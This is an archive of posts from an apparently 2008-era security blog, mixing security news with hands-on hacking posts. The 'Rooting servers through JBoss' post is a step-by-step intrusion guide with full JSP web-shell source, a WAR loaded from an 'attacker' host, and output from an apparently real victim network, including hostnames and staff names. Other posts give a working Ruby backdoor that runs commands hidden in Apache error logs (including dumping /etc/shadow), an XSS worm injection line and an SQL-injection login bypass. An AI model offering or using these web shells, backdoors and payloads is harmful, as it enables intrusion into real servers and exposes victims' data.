DNS exploits out in the wild
HDM and I)ruid of the Metasploit project have finally released exploits for the DNS vulnerabilities Dan Kaminsky talked about for quite a while without giving further details. The modules are only available in the development tree of Metasploit and are announced to only work on Linux platforms... Here comes the explanation of the vulnerability in modern DNS servers by I)ruid:
The first flaw is that since DNS (over UDP) is connectionless, it can easily be spoofed. The original primary mitigation against this was to make use of a 16-bit transaction ID which is used to correlate requests and replies that the attacker would have to guess in order to correctly spoof a reply packet. This makes spoofing harder, but not an insurmountable task; you just need to be able to send a whole lot of packets to eventually get one right at match the transaction ID chosen for the request packet. The second flaw was that additional records would be inserted into the cache which were included in replies from another nameserver. This is core protocol functionality, however the original problem was somewhat mitigated by creating the in-bailiwick constraints that essentially limits the domain space for additional records that could be sent in the replies to hostnames from a given domain. Sounds reasonable; this prevents nameservers from doing malicious things to records in domains that they weren't queried for or aren't authoritative for, while still allowing nameservers who are authoritative for a domain to update the records they need to. When you combine the attacks for these two flaws however, and introduce nameserver query recursion, an attacker can essentially cause the target nameserver to make as many queries as the attacker wants while also pretending to be the authoritative nameserver and spoofing the responses, achieving the birthday attack against the transaction ID and successfully updating the nameserver record for a domain to point to a malicious nameserver address. You can also use this trick to inject cache entries for individual hostname records as long as those hostnames are both not already cached, and also in-bailiwick.
The first attacks are running... It is time to patch!
VX E-Zine released on EOF site
The group I founded back in 2006 known as EOF (Electrical Ordered Freedom) has now released an electronical E-Zine with the focus on virus writing. The E-Zine has been made by the groups EOF and DoomRiderz, officially also RRLF, but they have not contributed anything, but instead announced their end and brought out a "Best Of" E-Zine, which you can find on [their page]. Of course not only the members of EOF and DR have contributed things, but also other people, some more known in the scene, some not...
In my personal oppinion this E-Zine is very nice and a must-read for everyone interested in viruses. The authors have put their focus on the quality of the contributions and not the quantity, which does not make this E-Zine the biggest one ever, but a very interesting one to check out.
You can download the E-Zine from [EOF-Project.net]
Cold Boot Attacks, code available
The guys behind the theory of "Cold Boot Attacks on Encryption Keys" have now published the source code of the tools they developed to break systems like Mac OS X FileVault and Windows BitLocker. Their whole paper called "Lest We Remember: Cold Boot Attacks on Encryption Keys" can be found [here]. Furthermore they have published all their tools on the following page:
[citp.princeton.edu/memory/code/], which includes the following tools:
Memory imaging -------------- USB / PXE Imaging Tools EFI Netboot Imaging Tools Automatic key-finding --------------------- AESKeyFinder RSAKeyFinder Error-correction for AES key schedules -------------------------------------- AESFix
If you are interested in more, then you should also check out the [media section] with images and videos showing and describing the whole process.
F-Secure: Google Earth Demo
Whoever of you checks out the F-Secure weblog from time to time will have heard of the Google Earth worldmap, that F-Secure developed. The worldmap shows infections and malware worldwide, is browsable and clickable. Until now F-Secure only released screenshots of their application, showing bot, worm or virus infections and furthermore spam and phishing scams worldwide. Now F-Secure released their first video showing the Google Earth Demo live on their YouTube's group "fslabs". Check it out! It's very interesting and impressing.
The YouTube video can be found at [www.youtube.com/watch?v=UUwc71ySnLI].
Jailbreak for iPhone 2.0
Yesterday the guys behind the "iPhone Dev Team" have released their Pwnage 2.0 tool, which breaks the software of the iPod Touch, the iPhone and iPhone 3G running the firmware 2.0. Several hours ago an update of the tool has been made public solving some bugs, which have been reported. So the up-to-date version of Pwnage for iPhone is 2.0.1 at the moment.
With this "crack" it is easily possible to run third-party applications on the iPhone, which are developed open source by the community. It is still not possible to break the SIM lock, but let's see if this will come in future versions.
I very much respect the work of the developers, they are doing a great job in reversing the iPhone and bringing out their tool for free to help the community. Even I have no iPhone myself I love the spirit, that motivates those guys to do this!
For mirrors and downloads check out [blog.iphone-dev.org].
RCE through Intel CPU bugs
On the upcoming Hack In The Box Security Conference 2008 from the 27th to the 30th October in Malaysia a well known security researcher named Kris Kaspersky wants to show a new technique to compromise computers remotely regardless of operating system or software running on the system. Kris Kaspersky said he knows of 128 bugs in the Intel Core 2 and about 230 bugs in the Intel Itanium CPU. Many of those bugs are able to crash a system, locally and remotely, but some bugs make it possible to execute arbitrary code on the machine and compromise it.
With a combined technique of JavaScript and TCP/IP storms he wants to show the audience how to get control of a Intel based system quite easily. Using CPU bugs to attack a system is nothing totally new, but it hasn't been used widely so far. With this presentation Kris Kaspersky wants to show the dangers, that are open to get attacked by malicious people, such as malware writers. A worm is one possibility of exploiting such issues and shocking enough Intel has NO workarounds for the problems, yet. Keeping the users at risk.
To read the entire entry at the HITBSecConf2008 homepage, go [here].
Rooting servers through JBoss
Some days ago I surfed a bit in the internet and looked at the sites of the security company n.runs and found a cool document, which is called "Hacking JBoss using a Browser", check it out [here]. I very much liked the document, it was well written and it really works in real case scenarios. First I couldn't believe, that people are really so naive to forgot securing the JMX Console of JBoss and so I tried searching Google and yeap... it works!
Let's look at the steps we need to take to root (backdoor) a server using an unsecured JBoss default installation. First of we need to find a server. We know the following: JBoss is listening on port 8080, which makes it quite easy to find servers searching for default strings on the main page, such as "JMX Console". This should be enough information for you to build a good Google String! When you click on the link JMX Console you will be redirected to http://host:8080/jmx-console/. There you have to search for a subsection called "jboss.deployment" and a link named "flavor=URL,type=DeploymentScanner". Click on it!
Now you are on a page having the following URL: http://host:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL. Here you have to look for the following: A subsection (function) called "void addURL()". Normally you will find TWO functions called like this, take the function with the "Param Type" "java.lang.String". If this function is not secured you can easily add WAR files to be included on the webserver and THAT'S what we will do now!
The WAR files consists of two files, the one is called cmd.jsp and has the following as content:
<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
It is quite uncomplicated: The JSP page just takes in a command, executes it on the server and prints the output to the page. Now we create a file called web.xml in a subdirectory named WEB-INF:
<?xml version="1.0" ?> <web-app xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd" version="2.4"> <servlet> <servlet-name>Command <jsp-file>/cmd.jsp </servlet> </web-app>
To finally create the resulting WAR file, type in the following command on a console of your choice and with the Java utility jar being installed: "jar cvf cmd.war WEB-INF cmd.jsp". Load the file to your machine, for example http://attacker/cmd.war. Now with the function "void addURL()" include the file. If all works fine you will get to see the following message: "Operation completed successfully without a return value.". Now it can take some seconds and then try to access the page http://host:8080/cmd/cmd.jsp and you should see your backdoor!
To check what user you are type in whoami (works on Linux/Unix and Windows installations of JBoss), I tested it and you will find a lot of servers printing you this:
Command: whoami nt authority\system
Bingo! You are an administrator and have a backdoor running on the server with system rights! You can do whatever you want now, some examples:
Command: ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . .: servweb1
Primary Dns Suffix . . . . .: mapdata.local
Node Type . . . . . . . . . .: Unknown
IP Routing Enabled. . . . . .: No
WINS Proxy Enabled. . . . . .: No
DNS Suffix Search List. . . .: mapdata.local
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
Description . . . . . . . . .: HP NC320i PCIe Gigabit Server Adapter
Physical Address. . . . . . .: 00-18-71-77-7A-DD
DHCP Enabled. . . . . . . . .: No
IP Address. . . . . . . . . .: 10.0.0.56
Subnet Mask . . . . . . . . .: 255.255.255.0
IP Address. . . . . . . . . .: 11.0.0.8
Subnet Mask . . . . . . . . .: 255.255.255.0
Default Gateway . . . . . . .: 10.0.0.197
DNS Servers . . . . . . . . .: *.*.*.*
*.*.*.*
*.*.*.*
(DNS Servers IP addresses replaced with asterisk)
Command: NET VIEW /DOMAIN Domain ----------------------------------- CLASSROOM MAPDATA SIDSA VENTAS The command completed successfully.
Command: NET VIEW Server Name Remark ----------------------------------------------------------- \\ACOMERCIAL2 Blanca Lidia Bocanegra \\ADMIN1 \\ADMIN3 \\ADMINDIR Direccion de Administracion ABaez \\ADMINRH abigail \\CAPACITACION1 \\CAPACITACION2 \\CARTOGRAFIA1 Cartografia1 \\CARTOGRAFIA10 Marisela - Jose Manuel \\CARTOGRAFIA11 Anuar \\CARTOGRAFIA12 \\CARTOGRAFIA14 \\CARTOGRAFIA16 \\CARTOGRAFIA2 NOE \\CARTOGRAFIA3 DELFIS-JHON \\CARTOGRAFIA4 RICHAR - Rulas \\CARTOGRAFIA5 \\CARTOGRAFIA6 Delfis - Jhon \\CARTOGRAFIA7 \\CARTOGRAFIA8 Roman - Edgar \\CARTOGRAFIA9 Raquel - Raul \\CHECADOR \\CND1 \\CND2 \\CONTA1 \\D-TECNOLOGIAS \\DESARROLLO \\DESARROLLO1 \\DESARROLLO11 \\DESARROLLO13 \\DESARROLLO15 \\DESARROLLO2 \\DESARROLLO3 \\DESARROLLO4 \\DESARROLLO5 RAFA \\DESARROLLO6 \\DESARROLLO7 \\DESARROLLO9 \\DWEB1 George@dweb1 \\DWEB2 \\DWEB3 \\EPSILON \\GDCD Gina \\GPROYECTOS Andres Ortiz \\JMWONGPC Pc de escritorio de Juan Manuel Wong \\KAPPA \\LAMBDA \\LAP-PATRICIO \\LAP01-COMERCIAL laptop dell acomercial 01 \\LAP02-COMERCIAL Laptod Dell Miguel Angel Zamudio \\PS-70D02E \\SAULIN S@ulin \\SERVAPPSVM \\SERVDCS1 Servidor Desarrollo \\SERVMAS1 \\SERVMASDB \\SERVWEB1 Servidor Web \\SIGMA \\ZETA The command completed successfully.
Have fun playing around... Happy Hacking! Hope you learned something new.
Information: Take care about your actions! When the server administrator does a netstat to check connections he/she will see a connection opened to your webserver (because of the WAR file included). So to remove everything you should also use the function "void removeURL()" when you are finished.
Azet.sk - Thousands of emails leeched
And another time a big community website has been hit by a security bug. This time the victim was the slovakian website Azet.sk. The site includes a platform for dating, which was vulnerable to manipulation of parameters, which then made it possible for an attacker to get users email adresses. With a PoC script coded and releases on a slovakian security site, attackers were able to extract more then 200.000 valid email adresses. Nice shot!
What is really shocking about this whole case is the way the vendor reacted: "It is not a bug, it is a feature!"... Okay! That's a way to explain, that you really have made something heavily wrong while developing and securing your website. Just imagine other sites like MySpace would have such great "features", too: Up to 100 million emails would get public. But for luck not every security expert thinks of bugs as a feature.
Some statements (quite unlogical) from the vendor:
No emails leaked from the website Zoznamka.azet.sk, as is stated in articles on blog.synopsi.com and pocitace.sme.sk, only email contacts. --- (whatever the difference might be ...)
Processing of email addresses was developed and programmed in such way. --- (great development!)
Described way how to extract email addresses from HTML code is commonly used by the spammers in the world, they get addresses and misuse them. So this is not directly a security issue of the Zoznamka.azet.sk website. --- (uhm, yeah... and because of the spammers you should care for this!)
And so on... It seems the vendor has no real idea of security at all!
Check out the email dump [here].
Original news at [Zone-H].
Computer Bild talks about VX
My friend Michael Cichosz informed me some days ago, that there is a short article about the VX scene in the newest issue of the german computer magazine "Computer Bild". To be honest, this isn't the best magazine around and it is meant for people with a normal or low computer knowledge, but nevermind... The article is liked expected, much lines about the evil "Hackers", that are destroying everything, about Script-Kiddies, that turn into evil Hackers and make you be at risk and so on and so on. The normal media stuff. One thing Michael pointed my attention to made me smile: They actually indirectly cited my article about the VX scene in the Hakin9 magazine, read here:
Wer steckt hinter den Virii-Seiten? Einerseits sind es Idealisten, die auf die Sicherheitslücken von PC-Systemen hinweisen wollen. So wenigstens liest es sich auf den Eingangsseiten der Virii-Angebote. Einige betrachten sich als "Künstler", die nach Herausforderungen suchen. Es gelte, neue Techniken zu erlernen, schreibt etwa das aus Polen veröffentlichte Magazin Hakin9.
This translates to something like:
Who is behind those Virii-Sites? On the one hand there are idealists, that want to point the attention to security vulnerabilities in computer systems. At least this is the way it is written on most of the start pages of Virii-Sites. Some define themselves as "artists", that search for new challenges. It is about finding new techniques, that's what the polish magazine Hakin9 writes.
Thanks... Funny to have seen this!
The text this was all about: [VX - The Virus Underground].
ZoneAlarm blocks internet
Some minutes ago I phoned with my best friend having a flatrate now for talks in the german landline. He talked of a new virus, that he has seen on a PC of a friend of him, that has not been detected by AntiVir, but then he mentioned something interesting and told me the following: "You know what is really strange? Since the automatic Microsoft update I can't reach the internet anymore. My firewall ZoneAlarm is blocking all the traffic. I have to kill the firewall to surf, which is kind of unsafe!" I wondered a bit and was not sure if it was a problem only he had or if it might be something common. So I checked news at Heise.de/Security and found an article titled with "ZoneAlarm bockt nach Microsofts DNS-Patch", which perfectly describes his problem.
Until now there is still no official patch around for the firewall product of Check Point, but because of the massive amount of messages sent to the support they suggest users to first off deinstall the Microsoft patch KB951748. I called my friend again and told him to visit Heise and check out if this solves his problem. I hope it will and hopefully soon ZoneAlarm brings out a patch.
Original news at Heise.de/Security can be found [here].
Justin.tv hit by XSS Worm
Another XSS Worm has come to life. This time the video and chatting community [justin.tv] has been hit by a XSS Worm, that was non-malicious and only a Proof-of-Concept another time. The worm has been coded and set to life by the authors of the website [www.thedefaced.org]. The original news I have read can be found on [xssed.com]. x2Fusion from TheDefaced has stated the following concerning the worm:
This actually is the very first XSS worm which we have unleashed, and it was solely upon research reasons; non-malicious at all :) We've contacted the JTV Programmers prior to the fixing of the XSS worm and have sorted things out with them and made sure that they knew NO information such as IP Address, Cookies, Sessions and further information which poses private is not to be released. After that I put myself forward and found another XSS in turn to prove that I was dedicated to helping JTV out in any further possible vulnerabilities.
The worm has been made possible due to a bad (no) sanitization of the "Location" field in the users profile. It was possible to inject arbitrary commands and the authors used the following to inject the worms code:
<iframe id='tframeid' width=0 height=0 frameborder=0></iframe> <script src="justinworm.js" language="javascript"></script>"
The authors of xssed.com have made a graphic (PNG) showing the development of the worm in the network of justin.tv, look [here].
The worms source code can be found on [worms.xssing.com/sources/justintv.txt]. It is open to everyone due to the fact, that the autors coded it for educational purpose only. Furthermore the vulnerability is still fixed, to be precise it has been fixed on Sun, 29 Jun 2008 21:12:21 GMT.
What to say? Well, another time an XSS Worm has found its way to light, comprosing 2525 profiles at all and again it was NOT malicious! XSS Worms are still very young in the web and there are about one dozen around, all publicly available to learn from them, BUT and this is the problem: I guess it won't take very long anymore till the first malicious people come into the game and use the knowledge the good guys also have to do "bad" stuff. The potential is immense. Just imagine a malicious XSS Worm would manipulate the profile of a user and embed a manipulated SWF file into it, that will automatically try to attack users browser to execute arbitrary commands on the victims machine and install malware, for botnets, for spam, for whatever might be interesting. The time will come, if website administrators don't learn it NOW they will soon learn it the hard way. It is still time to learn it the soft way, by the help of such people like x2Fusion, who do ethical hacking, but it won't stay like this forever!
Wired-Security readers know first
Reading my emails todays morning I also received one by a friend of mine (Marko Rogge), which pointed me to a Heisec news entry. The news entry can be found [here] and is titled with "MSN-Phishing und Link-Spam greift um sich", which translates to something like "MSN-Phishing and Link-Spam is increasing". This entry has been made on the 7th of July or in other words: Yesterday. Readers of Wired-Security know this problem till one month, check the archive for the [news].
Furthermore the news entry of Heise is not very informative, it does not say a lot about the whole problem, nothing about the website, the hoster etc... And there is one specific point missing: The problem is not only a problem of MSN, the website of the Phishers also includes a login field for ICQ. All that is missing in the entry of Heise.
What shall I say? I am quite angry about this news because I informed Heise in an email ONE MONTH ago and I can proof this and they totally ignored my email and NOW, after one month they write about it as if THEY found this out. This is not only unprofessional, this keeps user to a risk for over 30 days being uninformed!
To proove I am not lying, here is the source code of my email sent to them:
MIME-Version: 1.0 Date: Wed, 4 Jun 2008 22:31:25 +0200 From: <skyout@wired-security.net> To: red@heisec.de Subject: MSN/ICQ Phishing Message-ID: <61a07e03c1e1286dd80dd97b20947d7e@s2.nexpaserver.de> X-Sender: skyout@wired-security.net User-Agent: RoundCube Webmail Content-Type: text/plain; charset="UTF-8" Content-Transfer-Encoding: 8bit http://wired-security.net/archive/2008/june/index.php#04_2_062008 Please look closer at this and maybe blog about it. If you do so, please be so fair to link back to my blog. Thanks. SkyOut.
Look at the date: 4th of JUNE! So instead of being so fair to blog about it and link back to my blog say instead ignored it and make their users believe they have found something new one month later then my users know it... This is unprofessional and awkward!
Conclusion: Next time I won't inform Heise anymore. Let them be uninformed if they can not even credit those, who informed them.
Apache error_log Backdoors (DE)
It's been quite a while since I posted my last Hakin9 article here, but now it is time for a new article. I planned to release it much earlier, so sorry for the delay. The article is called "Apache error_log Backdoors" and has been released in Hakin9 2/2008 (March).
The theory of the article is the following: Every time a user connects to an Apache webserver and tries to access a website, that is not there, an information about this access gets written to the error_log file of Apache, which is normally stored in /var/www/logs/error_log. We will use this feature to get shell commands, that then get executed. I have coded a Proof-of-Concept code called Yazuki in Ruby, that demonstrates a simple backdoor, look here:
#!/usr/bin/env ruby
# Name: Yazuki
# Author: SkyOut
# Date: October 2007
# Website: http://wired-security.net/
# Used Ruby Version. 1.8.4
# Tested on: OpenBSD 4.1
# This Proof-of-Concept code shows a simple backdoor
# concept, that does not need any open port to execute
# shell commands. Yazuki will search the error_log file
# of Apache every 5 seconds for a specified password and
# executes the given command, that can have up to five
# arguments (for more, just edit line 41).
# Possible commands: (Make sure to always have five arguments
# or edit line 41)
# less /etc/passwd > /var/www/htdocs/pw.txt ;
# ls -a /home > /var/www/htdocs/home.txt
# Start an indefinite loop
x = 0
while (x == 0)
# Define the error_log file of Apache
error_log = "/var/www/logs/error_log"
# Open Apaches error_log file
if (File.file?(error_log))
if (File.readable?(error_log))
File.open("#{error_log}").each { |line|
# Define the password
if line =~ /password/
# Make an array of the error_log line
array = line.split(" ");
# Take the 5 last arguments
command = array.fetch(13) + " " + \
array.fetch(14) + " " + array.fetch(15) \
+ " " + array.fetch(16) + " " + array.fetch(17)
# Execute the command
IO.popen("#{command}")
# Truncate the error_log file again
if (File.writable?(error_log))
File.truncate(error_log, 0)
end
end
}
end
end
# Wait 5 seconds
sleep 5
end
How does this code work? Well, it is very simple. We define a password (for example "password" (you should choose something better of course)) and then we connect to the server like this:
GET /password [our shell commands go here] HTTP/1.1 Host: www.example.com [newline] [newline]
So, let's say we have installed our backdoor as root, then we could for example send the following command to the webserver:
GET /password cat /etc/shadow > /var/www/htdocs/shadow ; HTTP/1.1 Host: www.example.com [newline] [newline]
Now of course this file won't exist, so it will drop an error in error_log. That file is searched through by our backdoor every 5 seconds and if our program finds a line, which contains our specified password it will take the 5 commands after this, put it together and send it to the underlying command shell. In the code this are the following lines:
if line =~ /password/
array = line.split(" ");
command = array.fetch(13) + " " + \
array.fetch(14) + " " + array.fetch(15) \
+ " " + array.fetch(16) + " " + array.fetch(17)
IO.popen("#{command}")
After that the file gets truncated again and we can now read the shadow file connecting to the webserver as follows:
GET /shadow HTTP/1.1 Host: www.example.com [newline] [newline]
The whole article printed in Hakin9 can be found [here] (Texts -> Attack).
The Proof-of-Concept code can be found [here] (Releases -> Hacking/Cracking).
HTTP GET Request in C (Win32)
I am just developing a program, that uses a GET Request to get data from a website. The first basic steps are done. Thanks to the help from WildCat. If you want to look at the first steps, here we go. The headers and stuff:
#include <stdio.h> #include <windows.h> #include <winsock2.h> #pragma comment(lib, "ws2_32.lib") #define MAX_PATH 512 #define PORT 80 SOCKET sock; SOCKADDR_IN remote_addr;
Then we have a function to set the host (could also be used to get the IP out of a hostname, see the lines commented out):
//u_long getip(const char *host)
void sethost(const char *host)
{
struct hostent *hp;
u_long host_ip;
host_ip = inet_addr(host);
if(host_ip == INADDR_NONE)
{
if((hp = gethostbyname(host)) != NULL)
{
//host_ip = *(u_long *)hp->h_addr_list[0];
sock = socket(AF_INET, SOCK_STREAM, 0);
memset(&remote_addr, 0, sizeof(SOCKADDR_IN));
remote_addr.sin_family = AF_INET;
remote_addr.sin_port = htons(PORT);
memcpy(&remote_addr.sin_addr,hp->h_addr_list[0],hp->h_length);
}
}
//return host_ip;
}
And finally the main() function to send the GET Request:
int main()
{
WSADATA wsaData;
char buffer[MAX_PATH];
char recvbuff[MAX_PATH];
int recvbufflen = MAX_PATH;
int res;
WSAStartup(MAKEWORD(2, 0), &wsaData);
sock = socket(AF_INET, SOCK_STREAM, 0);
sethost("www.example.com");
connect(sock, (SOCKADDR*)&remote_addr, sizeof(SOCKADDR));
sprintf(buffer, "GET / HTTP/1.0\r\nHost: www.example.com\r\n\r\n");
send(sock, buffer, strlen(buffer), 0);
res = recv(sock, recvbuff, recvbufflen, 0);
if (res > 0)
{
// do stuff here ...
}
WSACleanup();
return 0;
}
In future I will blog a bit more about this if it goes further!
Data of 41000 citizens in the net
The Chaos Computer Club printed a news about a big data problem occurring on the website of the market research institution TNS Infratest/Emnid. It was possible to get informations about 41000 (maybe more) citizens, that worked together with the institutions. The problem was as simple as shocking as stupid. The URL of the website looked like the following: www.report-global.com/mimitacon/[some stuff]/pages/business/masterdata.aspx?fromWhere=base&id=11XXXX. When you logged in with a working account you first of only saw the details of that specific account, but when you just changed the field "id" it was possible to see the data profiled of other citizens. With a simple Python script the CCC was able to get about 41000 data sets.
What is really shocking is how detailed those reports were. Your email adress has been written there, your date of birth, your phone number. Futhermore very sensitive data could be seen, like your incomes, your job, your health insurance, your bank informations, your credit cards used and much more...
How was the CCC able to get to those informations, did they hacked into it? No, not really... They got a mail with a valid account and looked closer at the website. That simple, that shocking.
The original article at [www.ccc.de].
All your data are belong to us
Not being in the best mood anyway, I just came accross a news on the blog of wired.com, which really shocked me: All YouTube logs have to be handed over to a company called Viacom. The whole logs are of a size of 4 Terrabyte, including users names and IP adresses, all the videos they have watched and everything they did on the website of YouTube. Viacom filed suit against Google in March 2007 for allowing users to upload copyright protected material to YouTube and they speak of a damage to them of 1 billion USD. Now Google is forced to give over ALL their logs to Viacom and they want to proof with this, that people are watching a lot of copyright protected material, more then free material.
Viacom even wanted more, wanted to have a copy of every video marked as private and more. This has been denied, but nevertheless the story is quite shocking to me. What is this all going to become in future? The whole concept of Web 2.0 seems at risk as companies force websites to shut down if they feel, that copyright laws are broken. This case is a perfect example for this and it's even worse, that Viacom now has the right to get the logs, decided by a court on Wednesday.
How is this all going to become in future? Are all those great project forced down by companies? That would be very bad as it would turn the internet to something else than it is now.
Original post: [blog.wired.com].
CFP for 25c3 opened now
The Call For Participation/Papers for the annual congress of the Chaos Computer Club has opened its gate. You can now hand in your ideas you would like to talk, make a workshop about or whatever. The topics are as always: Hacking, Making, Science, Society, Culture and Community. From the page of the Chaos Computer Club:
Criteria by which we assess a lecture * we consider the topic in general relevant for the participants * we consider the topic currently relevant for the participants * we consider the topic interesting, fun and worthy to be known more about * the lecture is about something the speaker made himself * we think the lecture might be fun * the lecture is part of a workshop (has a second part which is a workshop) * the lecture presents something new * the more information provided about the lecture and the speaker the better
The following "Dates and Deadlines" have been set:
* October 5th, 2008 (Midnight UTC) Submission due * November 7th, 2008 (Midnight UTC) Final notification of acceptance (or earlier) * November 28th, 2008 (Midnight UTC) Final papers due * December 27th - 30th, 2008 Chaos Communication Congress
To submit something go to [cccv.pentabarf.org/submission/25C3].
The "Jonny Hell" case
(click to enlarge image)
It's been quite a while since a topstory about a hacker has found its way into the media, but now it happened again. Talking to my father tomorrow he told me, that he has read a story in the newspaper about a guy called Aleksandr Suvorov, better known in the internet as "Jonny Hell", who has been caught at Frankfurt (Main) International Airport by Secret Service agents of the US and brought to prison. I read it also in the internet, coming across "Spiegel Online". The story is very interesting because of several things.
First of all it has to be said, that some newspapers talk of Aleksandr Suvorov as the worldwide most wanted hacker (which is typically for media to make it more shocking *no comment*) and for sure he is a big fish, that they got, no question. "Spiegel Online" talks of millions of stolen credit cards, that caused a damage to the people and companies of more then 100 million USD. Some other newspapers talk of only a few million. All in all the story is not totally clear, the media hype is immense. For example the "hack" of a cafe in the state of New York gave the hackers access to 5000 credit card numbers. But look closer:
Jonny Hell isn't such a case like every other one. Many things are unclear and the way his seizure happened is against law! That has to be stated. Secret Service agents have NO right to catch a person on german ground and bring him to prison. Furthermore the warrants of arrest for installing a trojan (packet sniffer) on the restaurants computer has been written out on the 12th of March this year. One week AFTER the seizure. What is also interesting is HOW LONG it takes until such a story comes to public newspapers. It takes months until the people are informed about what happened.
Let me make a cut here of the story of "Jonny Hell" and let's turn around. Is this really a rare case? Did this only happen to him and because he is SO DANGEROUS? Or can this happen to every little and small fish out there, evil or not, guilty or not? The answer is simple: It can happen to everyone and it did. If you are part of the german hacker community you should still know it, if not I will tell you. A person known under the handle of Rembrandt has been caught similar, but much more rudely on the 22nd of March in 2007 in a restaurant in Berlin by agents, that not even said, who they are or what they want. They took him with them in a car and brought him to a place he did not know of, no chance to find out where he was. He had to sign a statement to be left free and they told him if he would not sign it, they could keep him for days and longer. They wanted to scare him and make him admit, that he has hacked into the network of the Deutsche Bank for more than half a year. Even until today there has been no official charge against him, but the consequences of your apartment being raided, yourself being kept in a prison without the right to call a lawyer and more, are more fatal then a charge could be. Your chances to get a well paid job in the security industry equal almost zero.
Think about it: Do you still think democracy works? Do you think it is more then a word written on a paper? If yes, why can it happen, that people get caught by agents, that have no right to and won't face consequences for doing so? Why can it happen, that people are forced to sign a statement without speaking to a lawyer, without knowing what's actually going on, without a PROOF!? ... Take a moment, think about it.
Why ICQ sucks
I was at work today, chatting with some friends on ICQ. Around 18 o' clock I went home and wanted to log in to my account again, which resulted in an error message by Pidgin. My instant messenger could not log in to ICQ anymore, but instead gave me the message "Your version is not up-to-date to work with ICQ, go to http//pidgin.im/". I guess millions have seen this message and the site was no longer reachable, could be a logical DDoS, whatever. To make Pidgin work again you would have to recompile the whole program and change a value in the header file oscar.h from 0x010a to 0x010b. For linux users this might work out, but for Windows it is really annoying. So, why does ICQ do this? Simple answer: They want to force people to upgrade to ICQ 6, their new and "cooler" version of the client. If you check the whole thing with Wireshark while connecting you will get to see something like this (tip: look for the *.exe, that is, what they want you to download and install):
Frame 35 (669 bytes on wire, 669 bytes captured)
Ethernet II, Src: ZonetTec_e1:57:32 (00:50:22:e1:57:32), \
Dst: *:*:* (*:*:*:*:*:*)
Internet Protocol, Src: 64.12.161.153 (64.12.161.153), \
Dst: *.*.*.* (*.*.*.*)
Version: 4
Header length: 20 bytes
Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
Total Length: 655
Identification: 0x8aa2 (35490)
Flags: 0x04 (Don't Fragment)
Fragment offset: 0
Time to live: 105
Protocol: TCP (0x06)
Header checksum: 0xb325 [correct]
Source: 64.12.161.153 (64.12.161.153)
Destination: *.*.*.* (*.*.*.*)
Transmission Control Protocol, Src Port: aol (5190), \
Dst Port: 11234 (11234), Seq: 11, Ack: 102, Len: 615
Source port: aol (5190)
Destination port: 11234 (11234)
Sequence number: 11 (relative sequence number)
[Next sequence number: 626 (relative sequence number)]
Acknowledgement number: 102 (relative ack number)
Header length: 20 bytes
Flags: 0x18 (PSH, ACK)
Window size: 16384
Checksum: 0x7577 [correct]
[Good Checksum: True]
[Bad Checksum: False]
[SEQ/ACK analysis]
[PDU Size: 615]
AOL Instant Messenger
Command Start: 0x2a
Channel ID: Close Connection (0x04)
Sequence Number: 26668
Data Field Length: 609
TLV: Unknown
Value ID: Unknown (0x008e)
Length: 1
Value
TLV: Screen name
Value ID: Screen name (0x0001)
Length: 9
Value: 410996901
TLV: BOS server string
Value ID: BOS server string (0x0005)
Length: 17
Value: 64.12.25.112:5190
TLV: Authorization cookie
Value ID: Authorization cookie (0x0006)
Length: 256
Value
TLV: Error Code
Value ID: Error Code (0x0008)
Length: 2
Value: 28
TLV: Error URL
Value ID: Error URL (0x0004)
Length: 46
Value: http://ftp.icq.com/pub/ICQ6/Install_ICQ6U2.exe
TLV: Latest Beta Build
Value ID: Latest Beta Build (0x0040)
Length: 4
Value: 11
TLV: Latest Beta Name
Value ID: Latest Beta Name (0x0043)
Length: 9
Value: 5.33.3000
TLV: Latest Beta URL
Value ID: Latest Beta URL (0x0041)
Length: 46
Value: http://ftp.icq.com/pub/ICQ6/Install_ICQ6U2.exe
TLV: Latest Beta Info
Value ID: Latest Beta Info (0x0042)
Length: 52
Value: http://download.icq.com/download/icq6/whats_new.html
TLV: Latest Release Build
Value ID: Latest Release Build (0x0044)
Length: 4
Value: 11
TLV: Latest Release Name
Value ID: Latest Release Name (0x0047)
Length: 9
Value: 5.33.3000
TLV: Latest Release URL
Value ID: Latest Release URL (0x0045)
Length: 46
Value: http://ftp.icq.com/pub/ICQ6/Install_ICQ6U2.exe
TLV: Latest Release Info
Value ID: Latest Release Info (0x0046)
Length: 52
Value: http://download.icq.com/download/icq6/whats_new.html
Code Injection? (2)
Last month I talked a about a possible Code Injection in a PHP file, that did not occurr as I found out with some help of another person. Then this person suggested, that a stacked query could work to inject SQL commands, but also this did not work because mysql_query() does not allow stacked queries. All about this you can find in the [archive]. But why do I write about it again? Because there is a possible way to inject SQL commands and bypass the script! Let's look at it again. This is the script:
[...] $anmeldename=$_POST['anmeldename']; $passwort=$_POST['passwort']; $sql="SELECT * FROM `member` WHERE `Anmeldename`='$anmeldename'"; $erg=mysql_query($sql); $zeile = mysql_fetch_object($erg); $spw=md5($passwort); if($zeile->Passwort==$spw) [...]
So how can we bypass this script? Let's assume, that the table "members" has two columns: "Anmeldename" and "Passwort". So the table should look like this:
+-------------+----------------------------------+ | Anmeldename | Passwort | +-------------+----------------------------------+ | admin | unknown to us | +-------------+----------------------------------+
So, now the interesting thing are the last two lines. The password gets hashed with MD5 and is saved to $spw. Then the most interesting part comes in. The first line, that is given back by mysql_fetch_object() is searched for the field "Passwort" and that result is compared to the MD5 hash of the POSTed password. Okay now don't talk endless, here is the injection:
Anmeldename: x' LIMIT 0 UNION ALL SELECT 'admin', \ '9990775155c3518a0d7917f7780b24aa Passwort: ttt
